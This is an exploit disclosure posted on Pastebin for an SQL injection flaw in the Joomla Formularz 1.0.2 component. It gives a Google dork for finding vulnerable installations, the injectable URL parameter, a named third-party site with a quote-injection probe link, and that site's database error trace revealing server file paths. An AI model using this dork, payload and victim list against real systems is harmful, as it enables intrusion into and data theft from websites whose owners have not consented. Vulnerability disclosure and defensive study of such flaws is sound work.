KingSkrupellos

Joomla Formularz Components 1.0.2 SQL Injection

Jan 31st, 2019
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.15 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla Formularz Components 1.0.2 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 31/01/2019
  7. # Vendor Homepage : joomla.pl
  8. # Software Download Link : joomla.pl/zasoby/na-twoja-witryne/formularz-w-5-minut
  9. # Software Version : 1.0.2
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/index.php?option=com_formularz''
  14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  15. Special Elements used in an SQL Command ('SQL Injection') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19. # Reference Link : cxsecurity.com/issue/WLB-2019010304
  20. packetstormsecurity.com/files/151424/Joomla-Formularz-1.0.2-SQL-Injection.html
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26.  
  27. " Formularz " is open source software for Joomla.
  28.  
  29. ####################################################################
  30.  
  31. # Impact :
  32. ***********
  33.  
  34. Joomla Formularz 1.0.2 component for Joomla! is prone to an SQL-injection vulnerability
  35.  
  36. because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  37.  
  38. Exploiting this issue could allow an attacker to compromise the application,
  39.  
  40. access or modify data, or exploit latent vulnerabilities in the underlying database.
  41.  
  42. ####################################################################
  43.  
  44. # SQL Injection Exploit :
  45. **********************
  46.  
  47. /index.php?option=com_formularz&formularz=[SQL Injection]
  48.  
  49. ####################################################################
  50.  
  51. # Example Vulnerable Sites :
  52. *************************
  53.  
  54. [+] spb-pba.org.pl/index.php?option=com_formularz&formularz=1%27
  55.  
  56. ####################################################################
  57.  
  58. # Example SQL Database Error :
  59. ****************************
  60.  
  61. Fatal error: Uncaught exception 'RuntimeException' with message 'Unknown column
  62. 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM
  63. `sev_redirect_links` WHERE `old_url` = 'http://www.spb-pba.org.pl
  64. /index.php?option=com_formularz&formularz=1\'' LIMIT 0, 1' in
  65. /var/www/html/users/s/p/spbwww/www.spb-pba.org.pl/libraries/joomla/database
  66. /driver/mysqli.php:610 Stack trace: #0 /var/www/html/users/s/p/spbwww
  67. /www.spb-pba.org.pl/libraries/joomla/database/driver.php(1279):
  68. JDatabaseDriverMysqli->execute() #1 /var/www/html/users/s/p/spbwww
  69. /www.spb-pba.org.pl/plugins/system/redirect/redirect.php(86): JDatabaseDriver->
  70. loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(Exception))
  71. #3 {main} thrown in /var/www/html/users/s/p/spbwww
  72. /www.spb-pba.org.pl/libraries/joomla/
  73. database/driver/mysqli.php on line 610
  74.  
  75. ####################################################################
  76.  
  77. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  78.  
  79. ####################################################################
Add Comment
Please, Sign In to add comment